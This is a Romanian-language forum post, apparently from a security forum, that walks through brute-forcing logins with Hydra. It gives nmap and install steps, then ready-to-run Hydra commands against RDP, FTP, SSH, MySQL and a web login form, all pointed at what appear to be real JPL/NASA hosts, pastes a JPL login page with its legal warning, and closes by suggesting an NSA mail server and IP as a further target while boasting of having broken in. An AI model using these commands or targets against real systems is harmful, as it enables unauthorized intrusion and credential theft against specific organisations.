Jump to content
sleed

Tutorial BruteForce Attack Folosind Hydra

Recommended Posts

Posted (edited)

Salut. Va voi arata , cum sa folositi Hydra , pentru atacuri reusite :)...

Inainte de toate , folositi NMAP , sa scanati porturile :

nmap -sS ipguvernamentalsaucevretivoi:D

Bun , folosim , kali , backtrack , sau pur si simplu am instalat hydra :

sudo apt-get install build-essential linux-headers-$(uname -r) libgtk2.0-dev firebird-dev libpq-dev libsvn-dev libfbclient2 libmysqlclient-dev libafpclient-dev libncp-dev libssh-dev libpcre3-dev libncurses5-dev libidn11-dev

wget -c http://www.thc.org/releases/hydra-7.4.2.tar.gz
tar -xvzf hydra-7.4.2.tar.gz
cd hydra-7.4.2

./configure
make
sudo make install

Gata am instalat hydra , acum sa trecem la TREABA'.

hydra -t 1 -V -f -l root -P darkc0de.txt rdp://IP.JPL.NASA.GOV

t=Arata incercarile/timp [sa nu fie foarte mult , deoarece , s ar putea sa de-a rezultat NULL!]

V=arata output

P=lista cu dictionarul [pentru pass]

I=Numele , sau L=lista cu dictionarul numelui

IP=Adresa ip , ftp sau alta metoda prin atac.

Exemplu atac FTP:

hydra -t 1 -V -f -l root -P darkc0de.txt ftp://IP.MARS.JPL.NASA.GOV

Exemplu atac SSH: :

hydra -t 5 -V -f -l root -P darkc0de.txt IP.SSH.JPL.NASA.GOV ssh

[CA SA MOARA FETILII]

Exemplu atac MySQl:

hydra -t 5 -V -f -l root -e ns -P darkc0de.txt ip.downloads.jpl.nasa.gov mysql

BUn,acum sa vedem cum folosim hydra , asupra unei web page form , luam un exemplu :D

<table width="100%" height="300" border="0" cellspacing="0" cellpadding="0">

<tr>

<td valign="top" align="center">

<table border="0" height="310" background="https://rstforums.com/forum/images/home3.jpg" >

<tr><td valign="top">

<p><b>Welcome to Service Preparation Subsystem(SPS) Web Portal. Please login with your JPL account or SPS account.</b></p>

<p>Information included herein is controlled under the International Traffic in Arms Regulations ("ITAR") by the U.S. Department of State. Export or transfer of this information to a Foreign Person or foreign entity requires an export license issued by the U.S. Department of State or an ITAR exemption prior to the export or transfer.</p>

<p>This computer is funded by the United States Government and operated by the California Institute of Technology

in support of ongoing U.S. Government programs and activities. If you are not authorized access to this system,

disconnect now.</p>

<p>Users of this system have no expectation of privacy, and by continuing, you consent to your keystrokes and data

content being monitored. Unauthorized Access is a violation of U.S. Federal Law.</p>

</td></tr>

<!--<tr><td align="center"><img src="https://rstforums.com/forum/images/home3.jpg"></td></tr>-->

<tr><td valign="bottom">

<p>SPS Portal is best viewed using Netscape 7.0 or higher, Internet Explorer 6.0 or higher,

or FireFox 1.0.6 or higher. At least Netscape 4.78 is required to view SPS Portal.</p>

</td></tr>

</table>

</td>

<td align="right" valign="center">

<form name="logonForm" method="post" action="/portalappsdev10g/Login.do">

<table bgcolor="#003366" border="0" >

<tr>

<td>

<table bgcolor="#006699" height="300">

<tr>

<td width="200"><font size="2" color="white">Please enter your JPL or SPS ID and password</font></td>

</tr>

<tr>

<td align="center">

<table><tr>

<td><font size=2 color="white"><b>Username:</b></font><br>

<input type="text" name="username" maxlength="50" size="20" value=""></td>

</tr>

<tr>

<td><font size=2 color="white"><b>Password:</b></font><br>

<input type="password" name="password" maxlength="50" size="20" value=""></td>

</tr>

<script language=javascript>

<!--

document.logonForm.username.focus();

//-->

</script>

Facem un action page :

<?php

$pass="yourpass";

$passGet=$_POST["password"];

if($passGet==$pass){
echo "success!";
echo "<br>";
}

else{
echo "fail";
}


?>

Si ii dam sa sara :--->

hydra -t 3 -l administrator -V -P darkc0de.txt IP.JPL.NASA.GOV http-form-post "/Login.do/log.php:user=^USER^&password=^PASS^:S=success"

Trebuie sa folosim si Live HTTP Headers , un modul pentru FirefoX.

Sursa : sleed from Romanian Security Team ;

Aveti grija , nu sunt responsabil de atacarea jet propulsion laboratory , puteti sa INCERCATI altceva :

emvm-gh1-uea08.nsa.gov:63.239.67.9 :) [mail server] :)

Asta l am spart eu , jepele :))

https://www.youtube.com/watch?v=dlFP6exj69E

Edited by sleed

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...